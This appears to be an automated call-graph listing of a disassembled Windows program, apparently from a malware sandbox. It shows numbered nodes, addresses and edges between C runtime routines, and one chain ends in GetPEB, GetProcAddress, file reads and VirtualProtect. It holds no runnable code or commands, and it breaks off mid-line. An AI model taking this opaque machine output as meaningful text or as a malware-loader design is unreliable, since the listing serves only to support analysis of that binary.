17007->17008 17009 30668c GetLastError 17007->17009 17008->17006 17010 306702 FreeLibrary 17008->17010 17009->17011 17010->17006 17011->17006 17011->17007 17012 3066bf LoadLibraryExW 17011->17012 17012->17008 17012->17011 17019 2ff4e6 17013->17019 17030 305a9b GetLastError 17016->17030 17018 301319 17018->16978 17020 2ff4f2 ___scrt_is_nonwritable_in_current_image 17019->17020 17025 301d11 EnterCriticalSection 17020->17025 17022 2ff4fd _unexpected 17026 2ff534 17022->17026 17025->17022 17029 301d28 LeaveCriticalSection 17026->17029 17028 2ff4b6 17028->16980 17029->17028 17031 305ab1 17030->17031 17032 305ab7 17030->17032 17033 306374 __strnicoll 6 API calls 17031->17033 17034 3063b3 __strnicoll 6 API calls 17032->17034 17036 305abb SetLastError 17032->17036 17033->17032 17035 305ad3 17034->17035 17035->17036 17038 3069f4 __strnicoll 12 API calls 17035->17038 17036->17018 17039 305ae8 17038->17039 17040 305af0 17039->17040 17041 305b01 17039->17041 17042 3063b3 __strnicoll 6 API calls 17040->17042 17043 3063b3 __strnicoll 6 API calls 17041->17043 17044 305afe 17042->17044 17045 305b0d 17043->17045 17049 3056b7 ___free_lconv_mon 12 API calls 17044->17049 17046 305b11 17045->17046 17047 305b28 17045->17047 17048 3063b3 __strnicoll 6 API calls 17046->17048 17050 305c5c __strnicoll 12 API calls 17047->17050 17048->17044 17049->17036 17051 305b33 17050->17051 17052 3056b7 ___free_lconv_mon 12 API calls 17051->17052 17052->17036 17054 305dce ___scrt_is_nonwritable_in_current_image 17053->17054 17067 301d11 EnterCriticalSection 17054->17067 17056 305dd8 17068 305e08 17056->17068 17059 305e14 17060 305e20 ___scrt_is_nonwritable_in_current_image 17059->17060 17072 301d11 EnterCriticalSection 17060->17072 17062 305e2a 17073 305c11 17062->17073 17064 305e42 17077 305e62 17064->17077 17067->17056 17071 301d28 LeaveCriticalSection 17068->17071 17070 305cca 17070->17059 17071->17070 17072->17062 17074 305c20 __Getctype 17073->17074 17076 305c47 __Getctype 17073->17076 17074->17076 17080 309e8a 17074->17080 17076->17064 17154 301d28 LeaveCriticalSection 17077->17154 17079 305a87 17079->16941 17082 309f0a 17080->17082 17083 309ea0 17080->17083 17084 3056b7 ___free_lconv_mon 14 API calls 17082->17084 17107 309f58 17082->17107 17083->17082 17088 3056b7 ___free_lconv_mon 14 API calls 17083->17088 17104 309ed3 17083->17104 17085 309f2c 17084->17085 17086 3056b7 ___free_lconv_mon 14 API calls 17085->17086 17089 309f3f 17086->17089 17087 3056b7 ___free_lconv_mon 14 API calls 17092 309eff 17087->17092 17094 309ec8 17088->17094 17091 3056b7 ___free_lconv_mon 14 API calls 17089->17091 17090 3056b7 ___free_lconv_mon 14 API calls 17095 309eea 17090->17095 17096 309f4d 17091->17096 17097 3056b7 ___free_lconv_mon 14 API calls 17092->17097 17093 309fc6 17098 3056b7 ___free_lconv_mon 14 API calls 17093->17098 17108 3092e1 17094->17108 17136 3095fd 17095->17136 17102 3056b7 ___free_lconv_mon 14 API calls 17096->17102 17097->17082 17103 309fcc 17098->17103 17100 3056b7 14 API calls ___free_lconv_mon 17105 309f66 17100->17105 17102->17107 17103->17076 17104->17090 17106 309ef5 17104->17106 17105->17093 17105->17100 17106->17087 17148 30a024 17107->17148 17109 3092f2 17108->17109 17135 3093db 17108->17135 17110 309303 17109->17110 17111 3056b7 ___free_lconv_mon 14 API calls 17109->17111 17112 309315 17110->17112 17113 3056b7 ___free_lconv_mon 14 API calls 17110->17113 17111->17110 17114 309327 17112->17114 17115 3056b7 ___free_lconv_mon 14 API calls 17112->17115 17113->17112 17116 309339 17114->17116 17117 3056b7 ___free_lconv_mon 14 API calls 17114->17117 17115->17114 17118 3056b7 ___free_lconv_mon 14 API calls 17116->17118 17121 30934b 17116->17121 17117->17116 17118->17121 17119 3056b7 ___free_lconv_mon 14 API calls 17120 30935d 17119->17120 17122 3056b7 ___free_lconv_mon 14 API calls 17120->17122 17124 30936f 17120->17124 17121->17119 17121->17120 17122->17124 17123 309381 17126 309393 17123->17126 17127 3056b7 ___free_lconv_mon 14 API calls 17123->17127 17124->17123 17125 3056b7 ___free_lconv_mon 14 API calls 17124->17125 17125->17123 17128 3093a5 17126->17128 17129 3056b7 ___free_lconv_mon 14 API calls 17126->17129 17127->17126 17130 3093b7 17128->17130 17131 3056b7 ___free_lconv_mon 14 API calls 17128->17131 17129->17128 17132 3093c9 17130->17132 17133 3056b7 ___free_lconv_mon 14 API calls 17130->17133 17131->17130 17132->17135 17133->17132 17135->17104 17137 30960a 17136->17137 17147 309662 17136->17147 17138 30961a 17137->17138 17140 3056b7 ___free_lconv_mon 14 API calls 17137->17140 17139 30962c 17138->17139 17141 3056b7 ___free_lconv_mon 14 API calls 17138->17141 17142 3056b7 ___free_lconv_mon 14 API calls 17139->17142 17143 30963e 17139->17143 17140->17138 17141->17139 17142->17143 17144 3056b7 ___free_lconv_mon 14 API calls 17143->17144 17145 309650 17143->17145 17144->17145 17146 3056b7 ___free_lconv_mon 14 API calls 17145->17146 17145->17147 17146->17147 17147->17106 17149 30a031 17148->17149 17150 30a050 17148->17150 17149->17150 17151 3096eb __Getctype 14 API calls 17149->17151 17150->17105 17152 30a04a 17151->17152 17153 3056b7 ___free_lconv_mon 14 API calls 17152->17153 17153->17150 17154->17079 17191 307d63 17155->17191 17158 307b07 17161 307b13 ___scrt_is_nonwritable_in_current_image 17158->17161 17159 305a9b __strnicoll 14 API calls 17167 307b44 _unexpected 17159->17167 17160 307b63 17163 301314 __strnicoll 14 API calls 17160->17163 17161->17159 17161->17160 17162 307b75 _unexpected 17161->17162 17161->17167 17164 307bab _unexpected 17162->17164 17205 301d11 EnterCriticalSection 17162->17205 17165 307b68 17163->17165 17170 307ce5 17164->17170 17171 307be8 17164->17171 17181 307c16 17164->17181 17202 3019ff 17165->17202 17167->17160 17167->17162 17184 307b4d 17167->17184 17172 307cf0 17170->17172 17237 301d28 LeaveCriticalSection 17170->17237 17171->17181 17206 30594a GetLastError 17171->17206 17175 2ff18f _unexpected 21 API calls 17172->17175 17177 307cf8 17175->17177 17178 30594a __Getctype 39 API calls 17182 307c6b 17178->17182 17180 30594a __Getctype 39 API calls 17180->17181 17233 307c91 17181->17233 17183 30594a __Getctype 39 API calls 17182->17183 17182->17184 17183->17184 17184->16990 17186 301a7c _unexpected std::bad_exception::bad_exception 17185->17186 17187 301aa8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17186->17187 17190 301b79 _unexpected 17187->17190 17189 301b97 17189->16997 17252 2f71d1 17190->17252 17192 307d6f ___scrt_is_nonwritable_in_current_image 17191->17192 17197 301d11 EnterCriticalSection 17192->17197 17194 307d7d 17198 307dbf 17194->17198 17197->17194 17201 301d28 LeaveCriticalSection 17198->17201 17200 301f88 17200->16990 17200->17158 17201->17200 17238 301c4e 17202->17238 17204 301a0b 17204->17184 17205->17164 17207 305960 17206->17207 17208 305966 17206->17208 17209 306374 __strnicoll 6 API calls 17207->17209 17210 3063b3 __strnicoll 6 API calls 17208->17210 17212 30596a SetLastError 17208->17212 17209->17208 17211 305982 17210->17211 17211->17212 17214 3069f4 __strnicoll 14 API calls 17211->17214 17216 3059fa 17212->17216 17217 3059ff 17212->17217 17215 305997 17214->17215 17219 3059b0 17215->17219 17220 30599f 17215->17220 17216->17180 17218 301f83 CallUnexpected 37 API calls 17217->17218 17221 305a04 17218->17221 17223 3063b3 __strnicoll 6 API calls 17219->17223 17222 3063b3 __strnicoll 6 API calls 17220->17222 17225 3059ad 17222->17225 17224 3059bc 17223->17224 17226 3059c0 17224->17226 17227 3059d7 17224->17227 17229 3056b7 ___free_lconv_mon 14 API calls 17225->17229 17228 3063b3 __strnicoll 6 API calls 17226->17228 17230 305c5c __strnicoll 14 API calls 17227->17230 17228->17225 17229->17212 17231 3059e2 17230->17231 17232 3056b7 ___free_lconv_mon 14 API calls 17231->17232 17232->17212 17234 307c5d 17233->17234 17235 307c95 17233->17235 17234->17178 17234->17182 17234->17184 17251 301d28 LeaveCriticalSection 17235->17251 17237->17172 17239 301c60 _Fputc 17238->17239 17242 301ba8 17239->17242 17241 301c78 _Fputc 17241->17204 17243 301bbf 17242->17243 17244 301bb8 17242->17244 17246 301bcd 17243->17246 17247 301c25 _Fputc GetLastError SetLastError 17243->17247 17245 2fd620 _Fputc 16 API calls 17244->17245 17245->17243 17246->17241 17248 301bf4 17247->17248 17248->17246 17249 301a2c __Getctype 11 API calls 17248->17249 17250 301c24 17249->17250 17251->17234 17253 2f71da IsProcessorFeaturePresent 17252->17253 17254 2f71d9 17252->17254 17256 2f95cd 17253->17256 17254->17189 17259 2f96b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17256->17259 17258 2f96b0 17258->17189 17259->17258 17293 2fc7ea 17260->17293 17263 3074e0 17265 3074f7 17263->17265 17266 3074e5 GetACP 17263->17266 17264 3074ce GetOEMCP 17264->17265 17265->16947 17267 3056f1 17265->17267 17266->17265 17268 30572f 17267->17268 17272 3056ff __strnicoll 17267->17272 17269 301314 __strnicoll 14 API calls 17268->17269 17271 30572d 17269->17271 17270 30571a RtlAllocateHeap 17270->17271 17270->17272 17271->16950 17271->16951 17272->17268 17272->17270 17273 2ff4ab std::ios_base::_Init 2 API calls 17272->17273 17273->17272 17275 3074ad 41 API calls 17274->17275 17276 3072c8 17275->17276 17277 307305 IsValidCodePage 17276->17277 17283 3073cd 17276->17283 17284 307320 std::bad_exception::bad_exception 17276->17284 17280 307317 17277->17280 17277->17283 17278 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17279 3074ab 17278->17279 17279->16955 17279->16959 17281 307340 GetCPInfo 17280->17281 17280->17284 17281->17283 17281->17284 17283->17278 17333 307837 17284->17333 17286 3079e8 ___scrt_is_nonwritable_in_current_image 17285->17286 17416 301d11 EnterCriticalSection 17286->17416 17288 3079f2 17417 307776 17288->17417 17294 2fc808 17293->17294 17295 2fc801 17293->17295 17294->17295 17296 30594a __Getctype 39 API calls 17294->17296 17295->17263 17295->17264 17297 2fc829 17296->17297 17301 305f2e 17297->17301 17302 305f41 17301->17302 17303 2fc83f 17301->17303 17302->17303 17309 30a055 17302->17309 17305 305f5b 17303->17305 17306 305f83 17305->17306 17307 305f6e 17305->17307 17306->17295 17307->17306 17330 307242 17307->17330 17310 30a061 ___scrt_is_nonwritable_in_current_image 17309->17310 17311 30594a __Getctype 39 API calls 17310->17311 17312 30a06a 17311->17312 17313 30a0b0 17312->17313 17322 301d11 EnterCriticalSection 17312->17322 17313->17303 17315 30a088 17323 30a0d6 17315->17323 17320 301f83 CallUnexpected 39 API calls 17321 30a0d5 17320->17321 17322->17315 17324 30a0e4 __Getctype 17323->17324 17326 30a099 17323->17326 17325 309e8a __Getctype 14 API calls 17324->17325 17324->17326 17325->17326 17327 30a0b5 17326->17327 17328 301d28 std::_Lockit::~_Lockit LeaveCriticalSection 17327->17328 17329 30a0ac 17328->17329 17329->17313 17329->17320 17331 30594a __Getctype 39 API calls 17330->17331 17332 307247 17331->17332 17332->17306 17334 30785f GetCPInfo 17333->17334 17343 307928 17333->17343 17340 307877 17334->17340 17334->17343 17336 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17338 3079da 17336->17338 17338->17283 17344 306ce0 17340->17344 17342 306de1 44 API calls 17342->17343 17343->17336 17345 2fc7ea __strnicoll 39 API calls 17344->17345 17346 306d00 17345->17346 17364 30573f 17346->17364 17348 306dbc 17351 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17348->17351 17349 306db4 17367 2f9f07 17349->17367 17350 306d2d 17350->17348 17350->17349 17353 3056f1 __strnicoll 15 API calls 17350->17353 17355 306d52 __alloca_probe_16 std::bad_exception::bad_exception 17350->17355 17354 306ddf 17351->17354 17353->17355 17359 306de1 17354->17359 17355->17349 17356 30573f __strnicoll MultiByteToWideChar 17355->17356 17357 306d9b 17356->17357 17357->17349 17358 306da2 GetStringTypeW 17357->17358 17358->17349 17360 2fc7ea __strnicoll 39 API calls 17359->17360 17361 306df4 17360->17361 17376 306e2a 17361->17376 17371 305769 17364->17371 17368 2f9f22 17367->17368 17369 2f9f11 17367->17369 17368->17348 17369->17368 17373 302a5e 17369->17373 17372 30575b MultiByteToWideChar 17371->17372 17372->17350 17374 3056b7 ___free_lconv_mon 14 API calls 17373->17374 17375 302a76 17374->17375 17375->17368 17377 306e45 __strnicoll 17376->17377 17378 30573f __strnicoll MultiByteToWideChar 17377->17378 17382 306e89 17378->17382 17379 307004 17380 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17379->17380 17381 306e15 17380->17381 17381->17342 17382->17379 17383 3056f1 __strnicoll 15 API calls 17382->17383 17385 306eaf __alloca_probe_16 17382->17385 17396 306f57 17382->17396 17383->17385 17384 2f9f07 __freea 14 API calls 17384->17379 17386 30573f __strnicoll MultiByteToWideChar 17385->17386 17385->17396 17387 306ef8 17386->17387 17387->17396 17404 3064f3 17387->17404 17396->17384 17405 306862 std::_Locinfo::_Locinfo_dtor 5 API calls 17404->17405 17406 3064fe 17405->17406 17407 306504 LCMapStringEx 17406->17407 17408 30652b 17406->17408 17409 30658f __strnicoll 5 API calls 17408->17409 17416->17288 17427 3033bb 17417->17427 17419 307798 17420 3033bb 29 API calls 17419->17420 17421 3077b7 17420->17421 17422 3077de 17421->17422 17423 3056b7 ___free_lconv_mon 14 API calls 17421->17423 17424 307a1d 17422->17424 17423->17422 17441 301d28 LeaveCriticalSection 17424->17441 17426 307a0b 17426->16960 17428 3033cc 17427->17428 17432 3033c8 _Yarn 17427->17432 17429 3033d3 17428->17429 17433 3033e6 std::bad_exception::bad_exception 17428->17433 17430 301314 __strnicoll 14 API calls 17429->17430 17431 3033d8 17430->17431 17434 3019ff __strnicoll 29 API calls 17431->17434 17432->17419 17433->17432 17435 303414 17433->17435 17437 30341d 17433->17437 17434->17432 17436 301314 __strnicoll 14 API calls 17435->17436 17438 303419 17436->17438 17437->17432 17439 301314 __strnicoll 14 API calls 17437->17439 17440 3019ff __strnicoll 29 API calls 17438->17440 17439->17438 17440->17432 17441->17426 17443 30533a 17442->17443 17445 305348 17442->17445 17443->17445 17449 305360 17443->17449 17444 301314 __strnicoll 14 API calls 17446 305350 17444->17446 17445->17444 17447 3019ff __strnicoll 29 API calls 17446->17447 17448 30535a 17447->17448 17448->16912 17449->17448 17450 301314 __strnicoll 14 API calls 17449->17450 17450->17446 17452 301810 17451->17452 17453 3017f3 17451->17453 17452->16906 17454 30180a 17453->17454 17455 3056b7 ___free_lconv_mon 14 API calls 17453->17455 17456 3056b7 ___free_lconv_mon 14 API calls 17454->17456 17455->17453 17456->17452 17458 301a38 17457->17458 17459 301a60 _unexpected 8 API calls 17458->17459 17460 301a4d GetCurrentProcess TerminateProcess 17459->17460 17460->16913 17462 30ca50 17461->17462 17463 30ca61 17462->17463 17466 30ca74 ___from_strstr_to_strchr 17462->17466 17464 301314 __strnicoll 14 API calls 17463->17464 17474 30ca66 17464->17474 17465 30cc8b 17468 301314 __strnicoll 14 API calls 17465->17468 17466->17465 17467 30ca94 17466->17467 17524 30ccb0 17467->17524 17470 30cc90 17468->17470 17472 3056b7 ___free_lconv_mon 14 API calls 17470->17472 17472->17474 17473 30cad8 17510 30cac4 17473->17510 17528 30ccca 17473->17528 17474->16855 17475 30cada 17478 3069f4 __strnicoll 14 API calls 17475->17478 17475->17510 17476 30cab6 17484 30cad3 17476->17484 17485 30cabf 17476->17485 17480 30cae8 17478->17480 17483 3056b7 ___free_lconv_mon 14 API calls 17480->17483 17481 3056b7 ___free_lconv_mon 14 API calls 17481->17474 17482 30cb4d 17486 3056b7 ___free_lconv_mon 14 API calls 17482->17486 17487 30caf3 17483->17487 17489 30ccb0 39 API calls 17484->17489 17488 301314 __strnicoll 14 API calls 17485->17488 17495 30cb55 17486->17495 17487->17473 17493 3069f4 __strnicoll 14 API calls 17487->17493 17487->17510 17488->17510 17489->17473 17490 30cb98 17491 30c065 std::ios_base::_Init 32 API calls 17490->17491 17490->17510 17492 30cbc6 17491->17492 17494 3056b7 ___free_lconv_mon 14 API calls 17492->17494 17496 30cb0f 17493->17496 17501 30cb82 17494->17501 17495->17501 17532 30c065 17495->17532 17500 3056b7 ___free_lconv_mon 14 API calls 17496->17500 17497 30cc80 17498 3056b7 ___free_lconv_mon 14 API calls 17497->17498 17498->17474 17500->17473 17501->17497 17501->17501 17504 3069f4 __strnicoll 14 API calls 17501->17504 17501->17510 17502 30cb79 17503 3056b7 ___free_lconv_mon 14 API calls 17502->17503 17503->17501 17505 30cc11 17504->17505 17506 30cc21 17505->17506 17507 30cc19 17505->17507 17508 30532c ___std_exception_copy 29 API calls 17506->17508 17509 3056b7 ___free_lconv_mon 14 API calls 17507->17509 17511 30cc2d 17508->17511 17509->17510 17510->17481 17512 30cc34 17511->17512 17513 30cca5 17511->17513 17541 31392c 17512->17541 17515 301a2c __Getctype 11 API calls 17513->17515 17517 30ccaf 17515->17517 17518 30cc7a 17520 3056b7 ___free_lconv_mon 14 API calls 17518->17520 17519 30cc5b 17521 301314 __strnicoll 14 API calls 17519->17521 17520->17497 17522 30cc60 17521->17522 17523 3056b7 ___free_lconv_mon 14 API calls 17522->17523 17523->17510 17525 30ca9f 17524->17525 17526 30ccbd 17524->17526 17525->17473 17525->17475 17525->17476 17556 30cd1f 17526->17556 17530 30cce0 17528->17530 17531 30cb3d 17528->17531 17530->17531 17571 31383b 17530->17571 17531->17482 17531->17490 17533 30c072 17532->17533 17535 30c08d 17532->17535 17534 30c07e 17533->17534 17533->17535 17536 301314 __strnicoll 14 API calls 17534->17536 17538 30c09c 17535->17538 17671 3127c4 17535->17671 17540 30c083 std::bad_exception::bad_exception 17536->17540 17678 30f005 17538->17678 17540->17502 17690 3069b5 17541->17690 17546 3069b5 39 API calls 17551 31397c 17546->17551 17547 31399f 17548 3139ab 17547->17548 17549 3056b7 ___free_lconv_mon 14 API calls 17547->17549 17550 30cc55 17548->17550 17552 3056b7 ___free_lconv_mon 14 API calls 17548->17552 17549->17548 17550->17518 17550->17519 17553 2fc8e4 17 API calls 17551->17553 17552->17550 17554 313989 17553->17554 17554->17547 17555 313993 SetEnvironmentVariableW 17554->17555 17555->17547 17557 30cd2d 17556->17557 17558 30cd32 17556->17558 17557->17525 17559 3069f4 __strnicoll 14 API calls 17558->17559 17568 30cd4f 17559->17568 17560 30cdbd 17562 301f83 CallUnexpected 39 API calls 17560->17562 17561 30cdac 17563 3056b7 ___free_lconv_mon 14 API calls 17561->17563 17564 30cdc2 17562->17564 17563->17557 17565 301a2c __Getctype 11 API calls 17564->17565 17566 30cdce 17565->17566 17567 3069f4 __strnicoll 14 API calls 17567->17568 17568->17560 17568->17561 17568->17564 17568->17567 17569 3056b7 ___free_lconv_mon 14 API calls 17568->17569 17570 30532c ___std_exception_copy 29 API calls 17568->17570 17569->17568 17570->17568 17572 313849 17571->17572 17573 31384f 17571->17573 17575 314063 17572->17575 17576 3140ab 17572->17576 17589 313864 17573->17589 17579 314069 17575->17579 17582 314086 17575->17582 17609 3140c1 17576->17609 17581 301314 __strnicoll 14 API calls 17579->17581 17580 314079 17580->17530 17583 31406e 17581->17583 17585 301314 __strnicoll 14 API calls 17582->17585 17588 3140a4 17582->17588 17584 3019ff __strnicoll 29 API calls 17583->17584 17584->17580 17586 314095 17585->17586 17587 3019ff __strnicoll 29 API calls 17586->17587 17587->17580 17588->17530 17590 2fc7ea __strnicoll 39 API calls 17589->17590 17591 31387a 17590->17591 17592 313896 17591->17592 17593 3138ad 17591->17593 17605 31385f 17591->17605 17594 301314 __strnicoll 14 API calls 17592->17594 17596 3138b6 17593->17596 17597 3138c8 17593->17597 17595 31389b 17594->17595 17600 3019ff __strnicoll 29 API calls 17595->17600 17601 301314 __strnicoll 14 API calls 17596->17601 17598 3138d5 17597->17598 17599 3138e8 17597->17599 17603 3140c1 __strnicoll 39 API calls 17598->17603 17627 31418c 17599->17627 17600->17605 17602 3138bb 17601->17602 17606 3019ff __strnicoll 29 API calls 17602->17606 17603->17605 17605->17530 17606->17605 17608 301314 __strnicoll 14 API calls 17608->17605 17610 3140d1 17609->17610 17611 3140eb 17609->17611 17612 301314 __strnicoll 14 API calls 17610->17612 17613 3140f3 17611->17613 17614 31410a 17611->17614 17617 3140d6 17612->17617 17618 301314 __strnicoll 14 API calls 17613->17618 17615 314116 17614->17615 17616 31412d 17614->17616 17619 301314 __strnicoll 14 API calls 17615->17619 17624 2fc7ea __strnicoll 39 API calls 17616->17624 17626 3140e1 17616->17626 17620 3019ff __strnicoll 29 API calls 17617->17620 17621 3140f8 17618->17621 17623 31411b 17619->17623 17620->17626 17622 3019ff __strnicoll 29 API calls 17621->17622 17622->17626 17625 3019ff __strnicoll 29 API calls 17623->17625 17624->17626 17625->17626 17626->17580 17628 2fc7ea __strnicoll 39 API calls 17627->17628 17629 31419f 17628->17629 17632 3141d2 17629->17632 17634 314206 __strnicoll 17632->17634 17633 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17635 3138fe 17633->17635 17636 314286 17634->17636 17637 31446a 17634->17637 17639 314273 GetCPInfo 17634->17639 17644 31428a 17634->17644 17635->17605 17635->17608 17638 30573f __strnicoll MultiByteToWideChar 17636->17638 17636->17644 17640 31430c 17638->17640 17639->17636 17639->17644 17642 3056f1 __strnicoll 15 API calls 17640->17642 17643 314333 __alloca_probe_16 17640->17643 17640->17644 17647 31445e 17640->17647 17641 2f9f07 __freea 14 API calls 17641->17644 17642->17643 17645 30573f __strnicoll MultiByteToWideChar 17643->17645 17643->17647 17644->17633 17644->17637 17646 31437f 17645->17646 17646->17647 17648 30573f __strnicoll MultiByteToWideChar 17646->17648 17647->17641 17649 31439b 17648->17649 17649->17647 17650 3143a9 17649->17650 17651 31440c 17650->17651 17652 3056f1 __strnicoll 15 API calls 17650->17652 17656 3143c2 __alloca_probe_16 17650->17656 17653 2f9f07 __freea 14 API calls 17651->17653 17652->17656 17654 314412 17653->17654 17655 2f9f07 __freea 14 API calls 17654->17655 17655->17644 17656->17651 17657 30573f __strnicoll MultiByteToWideChar 17656->17657 17658 314405 17657->17658 17658->17651 17659 31442e 17658->17659 17665 306245 17659->17665 17662 2f9f07 __freea 14 API calls 17663 31444e 17662->17663 17664 2f9f07 __freea 14 API calls 17663->17664 17664->17644 17666 3067ac std::_Locinfo::_Locinfo_dtor 5 API calls 17665->17666 17667 306250 17666->17667 17668 30658f __strnicoll 5 API calls 17667->17668 17670 306256 17667->17670 17669 306296 CompareStringW 17668->17669 17669->17670 17670->17662 17672 3127e4 HeapSize 17671->17672 17673 3127cf 17671->17673 17672->17538 17674 301314 __strnicoll 14 API calls 17673->17674 17675 3127d4 17674->17675 17676 3019ff __strnicoll 29 API calls 17675->17676 17677 3127df 17676->17677 17677->17538 17679 30f012 17678->17679 17680 30f01d 17678->17680 17681 3056f1 __strnicoll 15 API calls 17679->17681 17682 30f025 17680->17682 17688 30f02e __strnicoll 17680->17688 17686 30f01a 17681->17686 17683 3056b7 ___free_lconv_mon 14 API calls 17682->17683 17683->17686 17684 30f033 17687 301314 __strnicoll 14 API calls 17684->17687 17685 30f058 HeapReAlloc 17685->17686 17685->17688 17686->17540 17687->17686 17688->17684 17688->17685 17689 2ff4ab std::ios_base::_Init 2 API calls 17688->17689 17689->17688 17691 2fc7ea __strnicoll 39 API calls 17690->17691 17692 3069c7 17691->17692 17693 3069d9 17692->17693 17698 306226 17692->17698 17695 2fc8e4 17693->17695 17704 2fc93c 17695->17704 17701 306792 17698->17701 17702 30670d std::_Locinfo::_Locinfo_dtor 5 API calls 17701->17702 17703 30622e 17702->17703 17703->17693 17705 2fc94a 17704->17705 17706 2fc964 17704->17706 17722 2fc8ca 17705->17722 17707 2fc96b 17706->17707 17708 2fc98a 17706->17708 17712 2fc8fc 17707->17712 17726 2fc88b 17707->17726 17710 30573f __strnicoll MultiByteToWideChar 17708->17710 17713 2fc999 17710->17713 17712->17546 17712->17547 17714 2fc9a0 GetLastError 17713->17714 17715 2fc9c6 17713->17715 17717 2fc88b 15 API calls 17713->17717 17731 30133a 17714->17731 17715->17712 17718 30573f __strnicoll MultiByteToWideChar 17715->17718 17717->17715 17720 2fc9dd 17718->17720 17720->17712 17720->17714 17721 301314 __strnicoll 14 API calls 17721->17712 17723 2fc8d5 17722->17723 17725 2fc8dd 17722->17725 17724 3056b7 ___free_lconv_mon 14 API calls 17723->17724 17724->17725 17725->17712 17727 2fc8ca 14 API calls 17726->17727 17728 2fc899 17727->17728 17736 2fc86c 17728->17736 17739 301327 17731->17739 17733 301345 __dosmaperr 17734 301314 __strnicoll 14 API calls 17733->17734 17735 2fc9ac 17734->17735 17735->17721 17737 3056f1 __strnicoll 15 API calls 17736->17737 17738 2fc879 17737->17738 17738->17712 17740 305a9b __strnicoll 14 API calls 17739->17740 17741 30132c 17740->17741 17741->17733 17745 2f2010 GetModuleHandleA GetModuleFileNameW 17742->17745 17752 30401a 17745->17752 17747 2f2081 17756 2f1f00 17747->17756 17750 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17751 2f2099 17750->17751 17751->16717 17753 30402d _Fputc 17752->17753 17765 30408f 17753->17765 17755 30403f _Fputc 17755->17747 17807 2f1ba0 GetPEB 17756->17807 17758 2f1f1f 17808 2f1c10 GetProcAddress 17758->17808 17760 2f1f39 17761 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17760->17761 17763 2f1ffb 17761->17763 17763->17750 17764 2f1f31 17764->17760 17821 2f1db0 17764->17821 17766 3040bf 17765->17766 17767 3040ec 17766->17767 17768 3040ce 17766->17768 17779 3040c3 17766->17779 17770 3040f9 17767->17770 17789 2fd5c0 17767->17789 17769 301ba8 _Fputc 29 API calls 17768->17769 17769->17779 17773 304131 17770->17773 17774 304113 17770->17774 17771 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17777 304334 17771->17777 17775 3042c1 17773->17775 17776 304145 17773->17776 17795 30f46b 17774->17795 17775->17779 17780 305801 _Fputc WideCharToMultiByte 17775->17780 17776->17779 17781 304189 17776->17781 17782 3041df 17776->17782 17777->17755 17779->17771 17780->17779 17785 305801 _Fputc WideCharToMultiByte 17781->17785 17783 305801 _Fputc WideCharToMultiByte 17782->17783 17784 3041f2 17783->17784 17784->17779 17786 30420b GetLastError 17784->17786 17785->17779 17786->17779 17788 30421a 17786->17788 17787 305801 _Fputc WideCharToMultiByte 17787->17788 17788->17779 17788->17787 17790 2fd5d0 17789->17790 17799 305f88 17790->17799 17796 30f4a2 _Yarn std::_Locinfo::_Locinfo_dtor 17795->17796 17797 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17796->17797 17798 30f578 17797->17798 17798->17779 17800 305f9f 17799->17800 17802 2fd5ed 17799->17802 17801 30a055 __Getctype 39 API calls 17800->17801 17800->17802 17801->17802 17803 305fb9 17802->17803 17804 305fd0 17803->17804 17805 2fd5fa 17803->17805 17804->17805 17806 307242 __strnicoll 39 API calls 17804->17806 17805->17770 17806->17805 17807->17758 17809 2f1c59 CreateFileA 17808->17809 17810 2f1caa 17809->17810 17811 2f1cb3 GetFileSize 17809->17811 17814 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17810->17814 17812 2f1cd9 CloseHandle 17811->17812 17813 2f1cf1 17811->17813 17812->17810 17816 2f1cfc ReadFile 17813->17816 17815 2f1d98 17814->17815 17815->17764 17817 2f1d3c 17816->17817 17818 2f1d70 CloseHandle 17816->17818 17819 2f1d4d 17817->17819 17820 2f1d58 CloseHandle 17817->17820 17818->17810 17819->17820 17820->17810 17833 2f1000 17821->17833 17824 2f1000 106 API calls 17825 2f1e5b GetProcAddress 17824->17825 17826 2f1e84 VirtualProtect 17825->17826 17828 2f1edc 17826->17828 17829 2f1ed1 17826->17829 17830 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17828->17830 17844 2f1bd0 17829->17844 17832 2f1eeb 17830->17832 17832->17760 17834 2f1056 17833->17834 17848 2f1440 17834->17848 17836 2f13c7 17877 2f1b80 17836->17877 17841 2f1167 ___std_exception_copy 17841->17836 17843 302a5e std::locale::_Locimp::~_Locimp 14 API calls 17841->17843 17852 2f1490 17841->17852 17855 2f14c0 17841->17855 17871 2f1af0 17841->17871 17843->17841 17845 2f1bfa 17844->17845 17846 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17845->17846 17847 2f1c04 17846->17847 17847->17828 17849 2f1466 std::ios_base::_Init 17848->17849 17850 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17849->17850 17851 2f1487 17850->17851 17851->17841 17880 2f2410 17852->17880 17854 2f14aa 17854->17841 17857 2f1510 _strlen 17855->17857 17927 2f3090 17857->17927 17858 2f15b1 17865 2f15c4 17858->17865 17931 2f31c0 17858->17931 17863 2f18ef 17863->17841 17864 2f16bc 17869 2f1712 17864->17869 17948 2f3470 17864->17948 17953 2f35f0 17865->17953 17866 2f3470 70 API calls 17867 2f1601 std::ios_base::_Ios_base_dtor 17866->17867 17867->17864 17867->17866 17869->17865 17872 2f1b20 _Fputc 17871->17872 18123 2f2130 17872->18123 17875 2f71d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17876 2f1b4e 17875->17876 17876->17841 18142 2f2230 17877->18142 17881 2f2458 17880->17881 17883 2f243f 17880->17883 17884 